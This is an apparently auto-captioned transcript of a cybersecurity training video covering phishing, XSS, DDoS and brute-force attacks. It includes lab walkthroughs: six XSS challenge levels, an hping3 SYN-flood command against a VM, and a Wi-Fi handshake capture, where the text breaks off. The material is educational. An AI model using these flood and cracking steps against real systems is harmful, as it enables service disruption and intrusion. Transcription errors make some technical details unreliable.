type of social engineering where fraudulent message is sent to a Target on the premise of arriving from a trusted source basic purpose is to trick the victim into revealing sensitive information like passwords and payment information it's based on the word phishing which works on the concept of baits if a supposed victim catches the bait the attack can go ahead which in our case makes Jane the fish in the phishing emails the bait if Jane never opened the malicious link or was cautious about the email authenticity an attack of this nature would have been relatively ineffective but how does the hacker gain access to these credentials a phishing attack starts with a fraudulent message which can be transmitted via email or chat applications even using SMS conversations to impersonate legitimate sources is known as smishing which is a specific category of phishing attacks irrespective of the manner of transmission the message targets the victim in a way that coaxes them to open a malicious link and provide critical information on the requisite website more often than not the websites are designed to look as authentic as possible once the victims submit information using the link be it a password or credit card details the data is sent to the hacker who designed the email and the fake website giving him complete control over the account whose password was just provided often carried out in campaigns or an identical fishing mail sent to thousands of users the rate of success is relatively low but never zero between 2013 and 2015 corporate giants like Facebook and Google were tricked off of 100 million dollars due to an extensive fishing campaign where a known common associate was impersonated by the hackers apart from credit access some of these campaigns Target the victim device and install malware when clicked on the malicious links which can later function as a botnet or a target for ransomware attacks there is no single formula for there are multiple categories of phishing attacks the issue with Jane or the hacker stole our bank credentials falls under the umbrella of deceptive fishing a general email is sent out to thousands of users in this category hoping some of them fall prey to this scam spear fishing on the other hand is a bit customized version the targets are researched before being sent an email for example if you never had a Netflix subscription sending you an email that seems like the Netflix Team sends it becomes pointless this is a potential drawback of deceptive fishing techniques on the other hand a screenshot of a Spotify playlist being shared on social media indicates a probable point of entry the hacker can send counterfeit messages to the Target user while implying the source of such messages being Spotify tricking them into sharing private information since the hacker already knows the target uses Spotify the chances of victims taking the bait increase substantially for more important targets like CEOs and people with a fortune on their back the research done is 10 full which can be called a case of whaling the hackers prepare and wait for the right moment to launch their phishing attack often to still industry secrets for rival companies or sell them off at a higher price apart from just emails farming focuses on fake websites that resemble their original counterparts as much as possible a prevalent method is to use domain names like Facebook with a single o or YouTube with no e these are mistakes that people make when typing the full URL in the browser leading them straight to a counterfeit webpage which can fool them into submitting private data a few more complex methods exist to drive people onto fake websites like ARP spoofing and DNS cache poisoning but they are rarely carried out due to time and resource constraints now that we know how phishing attacks work let's look at ways to prevent ourselves from becoming victims while the implications of a phishing attack can be extreme protecting yourself against these is relatively straightforward Jane could have saved herself from credit card fraud had she checked the link in the email for authenticity and that it redirected to a secure website that runs on the https protocol even suspicious messages shouldn't be entertained one must also refrain from entering private information on random websites or pop-up Windows irrespective of how legitimate they seem it is also recommended to use secure anti-fishing browser extensions like cloudfish to sniff out malicious emails from legitimate ones the best way to prevent phishing is browsing the internet with care and being on alert for malicious attempts at all times start by learning about cross-site scripting from a Layman's perspective foreign also known as xss is a type of code injection attack that occurs on the client side the attacker intends to run harmful scripts in the victim's web browser by embedding malicious code in a genuine webpage or online application the real Attack takes place when the victim hits the malicious code infected web page or online application the web page or application serves as a vehicle for the malicious script to be sent to the user's browser forums message boards and online pages that enable comments are vulnerable vehicles that are frequently utilized for cross-scripting assaults a web feature web application is vulnerable to xss if the output it creates contains unsanitized user input the victim's browser must then pass this user input in vbscript ActiveX Flash and even CSS cross-site scripting attacks are conceivable they are nevertheless most ubiquitous in JavaScript going to the fact that JavaScript is most important to most browser experiences nowadays the main purpose of this attack is to steal the other user's identity be it via cookies session tokens and other information in most of the cases this attack is being used to steal the other person's cookies as we know cookies help us to log in automatically therefore with the stolen cookies we can log in with other identities and this is one of the reasons why this attack is considered as one of the riskiest attacks it can be performed with different client-side programming languages as well cross-site scripting is often compared with similar client set attacks as client-side languages are mostly being used during this however an xss attack is considered riskier because of its ability to damage even less vulnerable Technologies most often this attack is performed with JavaScript and HTML JavaScript is a programming language that runs on web pages inside your browser the client-side code add functionality and interactivity to the web page and is used extensively on all major applications and CMS platforms unlike server-side languages such as PHP JavaScript code runs inside your browser and cannot impact the website for other visitors it is sandboxed to your own Navigator and can only perform actions within your own browser window while JavaScript is client-side and does not run on the server it can be used to interact with the server by performing background requests attackers can then use these background requests to add unwanted spam content to a web page without refreshing it they can then gather analytics about the client's browser or perform actions asynchronously the manner of attack can range in a variety of ways it can be a single link which the user must click on to initiate a JavaScript piece of code it can be used to show any piece of images that can be later used as a front-end for malicious code being installed as malware but the majority of Internet users unaware of how metadata works or the ways in which web requests are called the chances of victims clicking on a redirecting links is far too high cross-site scripting can occur on the malicious script executed at the client side using a fake page or even a form that is displayed to the user on websites with displayed advertisements malicious emails can also be sent to the victim these attacks occur when the malicious user finds the vulnerable parts of the website and sends it as appropriate malicious input now that we understand the basics of cross-site scripting let us learn more about how this kind of attack works the first place we have the website or the web browser which is used to show content to the victim or which is the user in our case whenever the user wants to grab some content from the website the website asks the data from the server the server provides this information to the website and the web browser which ultimately resists the victim how the hacker comes into play here it passes on certain arguments to the web browser which is can be then forwarded back to the server or to the user at hand the entire cross-site scripting attack Vector means sending and injecting malicious code or script this attack can be performed in different ways depending on the type of attack the malicious script may be reflected on the victim's browser or stored in the database and executed every time when the user calls the appropriate function the main reason for this attack is inappropriate users input validation where the malicious input can get into the output a malicious user can enter a script which will be injected onto the website's code then the browser is not able to know if the executed code is malicious or not therefore this malicious script is being executed on the victim's browser or any faked form if that is being displayed for the users there are many ways to trigger an exercise attack for example the execution could be triggered automatically when the page loads or when a user hovers over specific elements of the page like hyperlinks potential consequences of cross-site scripting attacks include capturing keystrokes of a user redirecting a user to malicious websites running web browser-based exploits obtaining cookie information of a user who is logged into a website and many more in some cases cross-site scripting attack leads to complete compromise of the victim's account attackers can trick users into entering credentials on a fake form which can then provide all information to the attacker with the basic working of a cross-site scripting attack out of the way let us go over the different ways hackers can leverage vulnerable web applications to gather information and eventually Bridge those systems foreign purpose of Performing exercise attack is to steal the other person's identity as mentioned it may be cookies session tokens Etc xss may also be used to display faked Pages or forms for the victim however this can be performed in several ways we have a reflected attack this attack occurs when a malicious script is not being saved on the web server but is reflected in the website results reflected xss code is not being saved permanently in this case the malicious code is being reflected in any website result the attack code can be included in the faked URL or in the HTTP parameters it can affect the victim in different ways by displaying fake malicious page or by sending a malicious email in a reflected cross-site scripting example the input of a search form is reflected on the page to show what the search key was an attacker May crafter URL that contains malicious code and then spread the same URL via email or social media a user who clicks on this link opens the valid web application which then runs the malicious code in the browser this script is not stored in the web application and malicious code is shown only to one user the user that opens the link executes the script and the attack is not necessarily visible on the server side or to the app owner itself the next variant is a stored cross-site scripting attacks this occurs when a malicious script is being saved on the web server permanently this can be considered a riskier attack since it has leverage for more damage in this type of attack the malicious code or script is being saved on the server for example in the database of the website it is executed every time the users call the appropriate functionality this way stored xss attack can affect many users also as the script is being stored on the web server it will affect the website for a longer time in order to perform stored xss attack the malicious scripts should be sent through the vulnerable input form for example can be a comment field or review field this way the appropriate script will be saved in the database and evaluated on the page load or appropriate function calling in a stored xss example the script might have been submitted by an input field to the web server which did not perform a sufficient validation and stores the script permanently in the database the consequence of this might be that the script is now being delivered to all users visiting the web application and if for example able to gain access to the user session cookies in this attack the script is permanently stored in the web app the users visiting the app after the information retrieve the script the malicious code then exploits the flaws in the web application and the script and the attack is visible on the server side or to the app owner as well the third variant is Dom based cross-site scripting attacks this type of attack occurs when the Dom environment is being changed but the client-side code does not change when the Dom environment is being modified in the victim's browser the client-side code executes differently in order to get a better understanding of how xss Dom attack is being performed let us analyze the following example if there is a website called texting.com we know default is a parameter therefore in order to perform access Dom attack we should send a script as parameters a Dom based exercise attack may be successfully executed even when the server does not embed any malicious code into the web page by using a flaw in the JavaScript executed in the browser for example if the client-side JavaScript modifies the Dom tree of the web page it can be based on an input field or the get parameter without validating the input this allows the malicious code to be executed the malicious code the exploits flaws in the browser on the user side and the script and the attack is not necessarily visible on the server side or to the app owner by now it is clear that cross-site scripting attacks are difficult to detect and even tougher to fight against there are however plenty of fears one can Safeguard against such attacks let's go through some of these preventive measures like mentioned earlier exercise attacks are sometimes difficult to detect however this can be changed if you get some external help a way to prevent excessive attacks is using automated testing tools like crash test security suit or a kinetic security suit still manual testing is highly time consuming and costly and therefore not possible to be done for every iteration of your web application consequently your code shouldn't be untested before any release using automated security you can scan your web application for cross-site scripting and other critical vulnerabilities before every release this way you can ensure that a web application slide version is still secured whenever you alter or add a feature input fields are the most common point of entry for xss attack script therefore you should always screen and validate any information input into data fields this is particularly important if the data will be included as HTML output this can be used to protect against reflected xss attacks validation should occur on both the client side and server side as an added precaution this helps validating the data before it's being sent to the servers and can also protect against persistent xss Scripts this can be accomplished using JavaScript xss attacks only appear if any user input is being displayed on the web page therefore try to avoid displaying any untrusted user input if possible if you need to display user data restrict the places where the user input might appear any input displayed inside a JavaScript tag or a URL shown on the site is much more likely to be exploited than the input that appears inside a division or span element inside the HTML body protecting against xss vulnerabilities typically requires properly escaping user provided data that is placed on the page rather than trying to determine if the data is user provided and could be compromised we should always play it safe and Escape data whether it is user provided or not unfortunately because there are many different rules for escaping you still must choose the proper type of escaping before settling on a final code encoding should be applied directly before user controllable data is written to a page because the context you're writing into determines what kind of encoding you need to use for example values inside a JavaScript string require a different type of escaping to those in an HTML context sometimes you'll need to apply multiple layers of encoding in the correct order for example to safely embed user input inside an event handler you need to deal with both JavaScript context and the HTML context so you need to First Unicode escape the input and then HTML encoded content security policy or CSP is a computer security standard introduced to prevent cross-site scripting click checking and other code injection attacks resulting from the execution of malicious content in The Trusted web page context it is a candidate recommendations of the w3c working group on a web application security it's widely supported by modern web browsers and provides a standard method for website owners to declare approved origins of content that browsers should be allowed to load on that website HTTP only is an additional flag included in a set cookie HTTP response header using the HTTP only flag when generating a cookie helps mitigate the risk of client-side script accessing the protected cookie that is if the browser supports it if the HTTP only flag is included in the HTTP response header the cookie cannot be accessed through a client-side script again this is if the browser supports the select as a result even if a cross-site scripting flaw exists and a user accidentally accesses a link that exploits this flow the browser will not reveal the cookie to a third party if a browser does not support HTTP only and a website attempts to set an HTTP only cookie the HTTP only flag will be ignored browse the browser thus creating a traditional script accessible cookie as a result the cookie becomes vulnerable to theft of modification by any malicious script next on our docket is a live demonstration where we solve a set of cross-site scripting problems starting from the basic level to the topmost level 6. we're going to start at level 1. in this web application it demonstrates a common cause of cross-site scripting where user input is directly included in the page without proper escaping if we interact with a vulnerable application window here and find a way to make it execute JavaScript of our choosing we can take actions inside the vulnerable window or directly edit its URL bar this task needs only basic knowledge let's see why the most primitive injections work here right away let's do a simple query and inspect the resulting HTML page I am going to use this phrase with a single quote as a special character we can now inspect the HTML page we can see here in this line the special character single quote appears in the result over here the provided query text is placed directly in a b tag as in a body element we need to perform a reflected xss into the web application because they are non-persistent xss attacks and the preload should be included in the URL to perform successful exploitation we can use any payload but we're going to use the simple one to perform an alert in this web application it's simple and can be shown easily we're just going to write the script over here and we're going to press search as you can see we have successfully launched our first cross-site scripting attack we can see an alert box pop-up with the necessary message and a similar process can be used to steal browser cookies and passwords albeit with different commands now we have the option to move to level 2. in this web application it shows that how easily accessed bugs can be introduced in complex chat applications chat app conversations are stored in a database and retrieved when a user wants to see the conversation therefore if a malicious user injects some JavaScript code all visitors will be infected this kind of cross-site scripting attack is more powerful and it is more riskier than reflected cross-site scripting attacks and that's why is known as stored xss I posted my query with a special character of a single quote and this is what I get whatever I typed in simply appeared on the page right after I click on share status let's see the source you can see here the text I posted seems directly put inside a block code tag so even a simple script tag we used in level 1 should work here but it will not let us examine the code to understand why we're going to toggle the code away here and check the index.html file foreign part is line 32. the generated HTML fragment which is the HTML variable in the code is added to the mail HTML using the inner HTML method so when the browser passing this HTML fragment it will not execute any script tag defined within that HTML fragment HTML parser will not execute a script tag when it passes htmls via this method this is why the script tag like we used in level 1 is not going to work here our solution is to use events events will execute the defined javascripts we're going to use an image over here and when we press on share status and that's above injection we are loading an image that doesn't exist which causes to trigger an on error event an honor event the it will execute our alert method with that we are able to beat level 2 and we can now move up to the next level in our challenge as you can see clicking on any tab causes the tab number to be displayed in the URL fragment this hints that the value after the hashtag controls the behavior of the page that is it is an input variable to confirm let's analyze the code as you can see in line 43 inside the event handling the value provided after the hash in the URL is directly passed onto the true tab method no input validation is being performed the value passed to the choose tab method is directly injected into the IMG tag in line 17. this is an unsafe assignment and it is the vulnerable part of the code now all we have to do now is to craft a preload that would adjust the IMG tag to execute our JavaScript remember the script tag from Level 1 would not work here since the variable HTML is used to add the Dom dynamically hence the events are Aces here once again I will choose to use the existing IMG tag and change the source to something that doesn't exist hence forcing it to fall in to execute an on error even which I will pass the URL once we visit that URL we can see that our Java pop-up has opened up here with the same message of exercise level 3 has been completed but this we can now move on to level four which is going to present a different kind of attack in this web application there is a timer on the page that means whatever numbers we put in the Box a countdown starts and then when it finishes the application alerts that the countdown is finished and we can see the time is a pop-up appearing over here and this resets the timer again now it is obvious that the value entered in the text box is transferred to the server over the timer parameter in the URL let us examine the code to see how the timer parameter is being handled you're going to visit timer.html over here and we're going to check over here in line 21 the start timer method is being called in the onload event however the timer parameter is being directly passed to the start timer method we need to perform a pop-up Alert in the web application which escapes the content of the function start timer without baking the JavaScript code the parameter value is directly added to the start timer method without any filtering what we can try to do here is to inject an alert function to be executed inside the online event along with the start timer method we're going to remove this argument and put our script over here now let me press on create timer and we have a pop-up with exercise level 4 completed we can now move on to level 5. in this web application this application xss is different because this challenge description says cross-site scripting isn't just about correctly escaping data sometimes attackers can do bad things even without injecting new elements into the Dom it's kind of open redirect because the attack payload is executed as a result of modifying the Dom environment in the victim's browser this environment is used by the original client-side script so that the client-side code runs in an unexpected manner the vulnerability can be easily detected if the next Link in the sign up page is inspected the href attribute value of next link is confer which is exactly the value of the next URL query parameter as you can see over here this means using the next query parameter can be used to inject a JavaScript code to the href attribute of the next link the following is the best way to do it as soon as the user clicks on the link the script will be triggered foreign level 5 that we had provided in the URL as a parameter to the next variable since the value of next provided appears in a pop-up we can consider the attacker's success and move on to the final level 6. in the sub application it shows some of the external Javascript is received if you analyze the URL you can see that the script is loaded already the vulnerability lies within how the code handles the value after the hashtag if we check on line 45 the value right after the hashtag is taken as the gadget name and then in line 48 the value is directly passed on to the include Gadget method another include Gadget method that we can see over here you can see in line 18 a script tag is created and the URL Gadget name parameter value is directly used as the source attribute of the script tag in line 28. this means we can completely control the source attribute of the script tag that is being created that is with this vulnerability we can inject our own JavaScript file into the code we can inject the URL of our own hosted JavaScript into the web applications URL after the hashtag and the URL should not be using https but anything like that to bypass the regular expression for security checking going to remove the pre-store URL and we're going to load our own Javascript file finally we have reached the end of our challenge he completed six different varieties of cross scripting attacks and used different solutions for all of the six questions with work from home being the norm in today's era people spend considerable amount of time on the internet often without specific measures to ensure a secure session apart from individuals organizations worldwide that host data and conduct business over the internet are always at the risk of a DDOS attack these DDOS attacks are getting more extreme with hackers getting easy access to botnet farms and compromised devices as can be seen in the graph three of the six strongest DDOS attacks were launched in 2021 with the most extreme attack occurring just last year in 2020. lately cyber criminals have been actively seeking out new services and protocols for amplifying these DDOS attacks active involvement with hacked machines and botnets allow further penetration into the consumer space allowing much more elaborate attack campaigns apart from General users multinational corporations have also had their fair share of problems GitHub a platform for software developers was the target of a DDOS attack in 2018. widely suspected to be conducted by Chinese authorities this attack went on for about 20 minutes after which the systems were brought into a stable condition it was the strongest leaders attack to date at the time and made a lot of companies reconsider the security practices to combat such attacks even after years of experimentation DDOS attacks are still at large and can affect anyone in the consumer and corporate space hey everyone this is Baba from Simply learn and welcome to this video on what is Adidas attack let's learn more about what is a DDOS attack a distributed denial of service attack or DDOS is when an attacker or attackers attempt to make it impossible for a service to be delivered this can be achieved by thwarting access to virtually anything servers devices Services networks applications and even specific transactions within applications in a Dos attack it's one system that is sending the malicious data or requests a detours attack comes from multiple systems generally these attacks work by Drowning a system with requests for data this could be sending a web server so many requests to serve a page that it crashes under the demand or it could be a database being hit with a higher volume of queries the result is available internet bandwidth CPU and RAM capacity become overwhelmed the impact could range from a minor annoyance from disrupted services to experiencing entire websites applications or even entire businesses taking offline more often than not these attacks are launched using machines in a botnet a botnet is a network of devices that can be triggered to send requests from a remote Source often known as the command and control center the bots in the network attack a particular Target thereby hiding the original perpetrator of the DDOS campaign but how do these devices come under a botnet and what are the requests being made to the web servers let's learn more about these and how DDOS attack work Adidas attack is a two-phase process in the first phase a hacker creates a botnet of devices simply put a vast network of computers are hacked via malware ransomware or just simple social engineering these devices become a part of the botnet which can be triggered anytime to start bombarding a system or a server on the instruction of the hacker that created the botnet the devices in this networks are called Bots or zombies in the second phase a particular Target is selected for the attack when the hacker finds the right time to attack all the zombies in the botnet network send these requests the target thereby taking up all the servers available bandwidth these can be simple ping requests or complex attacks like SYM flooding and UDP flooding the aim is to overwhelm them with more traffic than the server or the network can accommodate the goal is to render the website or service inoperable there is a lot of wiggle room when it comes to the type of DDOS attack a hacker can go with depending on the target's vulnerability we can choose one of the three broad categories of DDOS attacks volume based attacks use massive amounts of bogus traffic to overwhelm a resource it can be a website or a server they include icmp UDF and spoofed packet flood attacks the size of volume based attack is measured in bits per second these attacks focus on clogging all the available bandwidth for the server thereby cutting the supply short several requests are sent to the server all of which warranty reply thereby not allowing the target to cater to the general legitimate users next we have the protocol level attacks these attacks are meant to consume essential resources of the target server they exhaust the load balances and firewalls which are meant to protect the system against the DDOS attacks these protocol attacks include syn floods and Smurf DDOS among others and the sizes measured in packets per second for example in an SSL handshake server replies to the Hello message sent by the hacker which will be the client in this case but since the IP is poofed and leads nowhere the server gets stuck in an endless loop of sending the acknowledgment without any end in sight finally we have the application Level attacks application layer attacks are conducted by flooding applications with maliciously crafted requests the size of application layer attacks is measured in requests per second these are relatively sophisticated attacks that Target the application and operating system level vulnerabilities they prevent the specific applications from delivering necessary information to users and Hawk the network bandwidth up to the point of a system crash examples of such an attack are HTTP flooding and bgp hijacking a single device can request data from a server using HTTP post or get without any issues however when the requisite botnet is instructed to bombard the server with thousands of requests the database bandwidth gets jammed and it eventually becomes unresponsive and unusable but what about the reasons for such an attack there are multiple lines of thought as to why a hacker decides to launch a DDOS attack on unsuspecting targets let's take a look at a few of them the first option is to gain a competitive advantage many DDOS attacks are conducted by hacking communities against rival groups some organizations hire such communities to stagger their Rivals resources at a network level to gain an advantage in the playing field since being a victim of a detours attack indicates a lack of security the reputation of such a company takes a significant hit allowing the rivals to cover up some ground secondly some hackers launch these DDOS attacks to hold multinational corporations at Ransom the resources are jammed and the only way to clear the way is if the target company agrees to pay a designated amount of money to the hackers even a few minutes of inactivity is detrimental to a company's reputation in the global market and it can cause a spiral effect both in terms of market value and product security index most of the time a compromise is reached and the resources are freed after a while tdos attacks have also found use in the political segment certain activists tend to use redos attacks to voice their opinion spreading the word online is much faster than any local Rally or forum primarily political these attacks also focus on online communities ethical dilemmas or even protests against corporations let's take a look at a few ways that companies and individuals can protect themselves against edos attacks the company can employ load balances and firewalls to help protect the data from such attacks load balances reroute the traffic from one server to another in a DDOS attack this reduces the single point of failure and adds resiliency to the server data a firewall blocks unwanted traffic into a system and manages the number of requests made at a definite rate it checks for multiple attacks from a single IP and occasional slowdowns to detect Adidas attack in action early detection of Adidas attack goes a long way in recovering the data lost in such an event once you've detected the attack you will have to find a way to respond for example you will have to work on dropping the malicious DDOS traffic before it teaches your server so that it doesn't throttle and exhaust your bandwidth here's where you will filter the traffic so that only legitimate traffic reaches the server by intelligent routing you can break the remaining traffic into manageable chunks that can be handled by your cluster resources the most important stage in DDOS mitigation is where you will look for patterns of DDOS attacks and use those to analyze and strengthen your mitigation techniques for example blocking an IP that's repeatedly found to be offending is a first step Cloud providers like Amazon web services and Microsoft Azure who offer high levels of cyber security including firewalls and threat monitoring software can help protect your assets and network from DDOS criminals the cloud also has greater bandwidth than most private networks so it is likely to fail if under the pressure of increased tdos attacks additionally reputable Cloud providers are for Network redundancy duplicating copies of your data systems and equipment so that if your service becomes corrupted or unavailable due to a DDOS attack you can switch to a secure access on backed up versions without missing a Beat one can also increase the amount of bandwidth available to a host server being targeted since tdos attacks fundamentally operate on the principle of overwhelming systems with heavy traffic simply provisioning extra bandwidth to handle unexpected traffic spikes can provide a measure of protection this solution can prove expensive as a lot of that bandwidth is going to go unused most of the time a Content delivery Network or a CDN distributes your content and boosts performance by minimizing the distance between your resources and end users it stores the cached version of your content in multiple locations and this eventually mitigates DDOS attacks by avoiding a single point of failure when the attacker is trying to focus on a single Target popular cdns include Akamai CDN cloudflare AWS cloudfront Etc let's start with our demo regarding the effects of DDOS attacks on a system for a demo we have a single device that will attack a Target making it a dose attack of sorts once a botnet is ready multiple devices can do the same and eventually emulate a DDOS attack to do so we will use the virtualization software called VMware with an instance of parrot security operating system running for a Target machine we will be running another VMware instance of a standard Linux distribution known as Linux light in a Target device we can use Wireshark to determine when the attack begins and see the effects of the attack accordingly this is Linux like which is a target machine and this is parrot security which is used by the hacker when trying to launch a DDOS attack this is just one of the distros that can be used to launch the attack we must first find the IP address of our Target so to find the IP address we open the terminal foreign ifconfig and here we can find the IP address now remember we're launching this attack in VMware now the both the instances of parrot security and Linux light are being run on my local network so the address that you can see here is 192.168.72.129 which is a private address this IP cannot be accessed from outside the network basically anyone who is not connected to my Wi-Fi when launching attacks with public servers or public addresses it will have a public IP address that does not belong to the 192.168 subnet once we have the IP address we can use a tool called hp3 hping 3 is an open source packet generator and analyzer for the TCP protocol to check what are the effects of an attack we will be using Wireshark Wireshark is a network traffic analyzer we can see whatever traffic that is passing through the Linux light distro is being displayed over here with the IP address the source IP and the destination IP as to where the request is being transferred to once we have the Dos attack launched you can see the results coming over here from The Source IP which will be parrot security Now to launch the hp3 command we need to give sudo access to the console which is the root access foreign the hp3 command will have a few arguments to go with it which are as you can see on the screen minus s and a flood a hyphen V hyphen p18 and the IP address of the target which is 192.168 72.129 in this command we have a few arguments such as the minus s which specifies syn packets like in an SSL handshake we have the syn request that the client sends to the server to initiate a connection The Hyphen flood aims to ignore the replies that the server will send back to the client in response to the syn packets here the parrot security OS is the client and Linux slide being the server minus v stands for verbosity as in where we will see some output when the requests are being sent The Hyphen p80 stands for Port 80 which you can replace the port number if we want to attack a different port and finally we have the IP address of our Target as of right now if we check Wireshark it is relatively clear and there is no indication of a DDOS attack incoming now once we launch the attack over here we can see the request coming in from this IP which is 192.168 72.128 till now even the network is responsive and so is Linux light the requests keep on coming and we can see the http flooding has started in flood mode after a few seconds of this attack continuing the server will start shutting down now remember Linux light is a distro that can focus on that serves as a backend now remember Linux light is a distro and such Linux distros are served as backend to many servers across the world for example a few seconds have passed from the attack now the system has become completely irresponsive this has happened due to the huge number of requests that came from Pilot security you can see whatever I press nothing is responded even the Wireshark has stopped capturing new requests because the CPU usage right now is completely 100 and at this point of time anyone who is trying to request some information from this Linux distro or where this Linux this row is being used as a backend for a server or a database cannot access anything else the system has completely stopped responding and any request any legitimate request from legitimate users will be dropped once you stop the attack over here it takes a bit of time to settle down now remember it's still out of control but eventually the traffic dies down and the system regains its strength it is relatively easy to gauge right now the effect of a Dos attack now remember this Linux light is just a VM instance actual website servers and web databases they have much more bandwidth and are very secure and it's tough to break into that is why we cannot use a single machine to break into them that is where Adidas attack comes into play what we did right now is a Dos attack as in a single system is being used to penetrate a Target server using a single request now when a DDOS attack multiple systems such as multiple private security instances or multiple zombies or bots in a botnet network can attack a Target server to completely shut down the machine and drop any legitimate request thereby rendering the service and the target completely unusable and inoperable as a final note we would like to remind that this is for educational purposes only and we do not endorse any attacks on any proven domains only test this on servers and networks that you have permission to test on cyber security has become one of the most rigid Industries in the last decade while simultaneously being the most challenged with every aspect of corporate culture going online and embracing cloud computing there is a plethora of critical data circulating through the internet all worth billions of dollars to the right person increasing benefits require more complex attacks and one of these attacks is a Brute Force attack a brute force or known as Brute Force cracking is the Cyber attack equivalent of trying every key on your keyring and eventually finding the right one Force attacks are simple and reliable there is no prior knowledge needed about the victim to start an attack most of the systems falling prey to Brute Force attacks are actually well secured attackers let a computer do the work that is trying different combinations of usernames and passwords until the final one that works due to this repeated trial and error format the strength of password matters a great deal although with enough time and resources brute force will break a system since they run multiple combinations until they find the right passcode hey everyone this is Baba from Simply run and welcome to this video on what is a Brute Force attack let's begin with learning about Brute Force attacks in detail a Brute Force attack also known as an exhaustive search is a cryptographic hack that relies on guessing possible combinations of targeted password until the current password is discovered it can be used to break into online accounts encrypted documents or even Network peripheral devices the longer the password the more combinations that will need to be tested a Brute Force attack can be time consuming and difficult to perform if methods such as data obfuscation are used and at times downright impossible however if the password is weak it could merely take seconds with hardly any effort dictionary attacks are an alternative to Brute Force attacks where the attacker already has a list of usernames and passwords that need to be stretched against the target it doesn't need to create any other combinations on its own dictionary attacks are much more reliable than brute force in a real world context but the usefulness depends entirely on the strength of passwords being used by the general population there is a three-step process when it comes to brute forcing a system let's learn about each of them in detail in Step 1 we have to settle on a tool that we are going to use for brute forcing there are some popular names on the market like hashcat Hydra and John the Ripple while each of them has its own strength and weaknesses each of them perform well with the right configuration all of these tools come pre-installed with certain Linux distributions that cater to penetration testers and cyber security analysts like Kali Linux and parrot security after deciding what tool to use we can start generating combinations of alphanumeric variables whose only limitation is the number of characters for example while using Hydra a single six digit password will create 900 000 passwords with only digits involved add alphabets and symbols to that sample space and that numbers grows exponentially the popular tools allow customizing this process let's say the hacker is aware of the password being a specific eight digit word containing only letters and symbols this will substantially increase the chances of being able to guess the right password since we remove the time taken to generate the longer ones we omit the need for including digits in such combinations these small tweaks go a long way in organizing an efficient Boost Force attack since running all the combinations with no filters will dramatically reduce the odds of finding the right credentials in time in the final step we run these combinations against the file or service that is being broken we can try and break into a specific encrypted document a social media account or even devices at home that connect to the internet let's say there is a Wi-Fi router the generated passwords are then fed into the connection one after the other it is a long and arduous process but the work is left to the computer other than someone manually clicking and checking each of these passcodes any password that doesn't unlock the router is discarded and The Brute Force tool simply moves on to the next one this keeps going on and totally fine the right combination which unlocks the router sometimes reaching the success stage takes days and weeks which makes it cumbersome for people with low computing power at the disposal however the ability to crack any system in the world purely lead to bad password habits is very appealing and the general public tends to stick with simple and easy to use passwords now that we have a fair idea about how Brute Force Works let's see if we can answer this question we learned about how complex passwords are tougher to crack by Brute Force among the ones listed on the screens which one do you believe will take the longest to be broken when using Brute Force tools leave your answers in the comments section and we will get back to you with the correct option next week let's move on to the harmful effects of getting a system compromised due to Brute Force attacks a hacked laptop or mobile can have social media accounts logged in giving the hackers free access to the victim's connections it has been reported on multiple occasions where compromised Facebook accounts are sending malicious links and attachments to people on their friends list one of the significant reasons for hacking malware infusion is best done when spread from multiple devices similar to Distributing spam this reduces the chance of circling back the source to single device which belongs to the hacker once brute forced A system can spread malware via email attachments sharing links file upload via FTP Etc personal information such as credit card data usage habits private images and videos are all stored in our systems be it in plain format or root folders a compromised laptop means easy access to these information that can be further used to impersonate the victim regarding Bank verification among other things once a system is hacked it can also be used as a mail server that distributes spam across lists of victims since the hack machines all have different IP addresses and Mac addresses it becomes challenging to trace the spam back to the original hacker with so many harmful implications arising from a boot Force attack it's imperative that the general public must be protected against such let's learn about some of the ways we can prevent ourselves from becoming a victim of Brute Force attacks using passwords consisting of alphabets letters and numbers have a much higher chance of its standing Brute Force attacks thanks to the sheer number of combinations they can produce the longer the password the less likely it is that a hacker will devote the time and resources to brute force them having alphanumeric passwords also allows the user to keep different passwords for different websites this is to ensure that if a single account or a password is compromised due to a breach or a hack the rest of the accounts are isolated from the incident foreign tication involves receiving a one-time password on a trusted device before a new login is allowed this OTB can be obtained either via email SMS or specific to fa applications like authi and Aegis email and SMS based otps are considered relatively less secure nowadays due to the ease with which SIM cards can be duplicated and mailboxes can be hacked applications that are specifically made for 2fa Cores are much more reliable and secure captchas are used to stop Bots from running through web pages precisely to prevent brute forcing through their website since Brute Force tools are automated forcing the hacker to solve captcha for every iteration of a password manually is very challenging the capture system can filter out these automated Bots that keep refreshing the page with different credentials thereby reducing the chances of Brute Force considerably a definite rule that locks the account being hacked for 30 minutes after a specific number of attempts is a good way to prevent Brute Force attempts many websites lock account for 30 minutes after three failed password attempts to secure the account against any such attack and an additional note some websites also send an email instructing the user that there have been three insecure attempts to log into the website let's look at a demonstration of how Brute Force attacks work in a real world situation the world has gone Wireless with Wi-Fi taking the reins in every household it's natural that the security will always be up for debate to further test the security index and understand Brute Force attacks we will attempt to break into the password of a Wi-Fi router for that to happen we first need to capture a handshake file which is a connection file from the Wi-Fi router to a connecting device like a mobile or a laptop the operating system used for this process is parrot security a Linux distribution that is catered to penetration testers all the tools being used in this demo can easily be found pre-installed in this operating system if getting your learning started is half the battle what if you could do that for free visit skillup by simply learn click on the link in the description to know more to start our demo we're going to use a tool called air Garden which is made to hack into wireless network specifically at this point it's going to check for all the necessary scripts that are installed in the system to crack into a Wi-Fi and to capture the handshake file we're going to need an external network card the significance of the external network card is a managed mode and a monitor mode for now the wlx1 named card is my external network adapter which I'm going to select to be able to capture data over the air we're going to need to put it in monitor mode as you can see above it's written it is in managed mode right now so we're going to select option 2 which is to put the interface in monitor mode and its name is now wlan0 monitor the monitor mode is necessary to capture data over the Earth that is the necessary Json why we need an external card since a lot of inbuilt cards that come with the laptops and the systems they cannot have a monitor mode installed once we select the mode we can go into the fifth which is the handshake tools menu in the first step you have to explore for targets and it is written that monitor mode is necessary to select a Target so let's explore for targets and press enter we have to let this run for about 60 seconds to get a fair idea about the networks that are currently working in this locality for example this ESS ID is supposed to be the Wi-Fi name that we see when connecting to a network geo24 recover me these are all the names that we see on our mobile when trying to search for the Wi-Fi's this BSS ID is supposed to be an identifier somewhat like a MAC address that identifies this network from other devices this channels features on one or two or there are some many channels that the networks can focus on this here is supposed to be a client that is connected to one such Network for example the station that you can see 5626 this is supposed to be the macro test of the device that is connected to a router this basis ID is supposed to be which wi-fi it is connected to for example 58 95 d8 is this one which is the jio 24 router so we already know which router has a device connected to it and we can use our attack to capture this handshake now that we it has already ran for one minute now that we press Ctrl C we will be asked to select a Target see it has already selected the number five which is the jio 24 router as the one with clients so it is easy to run an attack on and it is easy to capture a handshake for select Network 5 and we run a capture 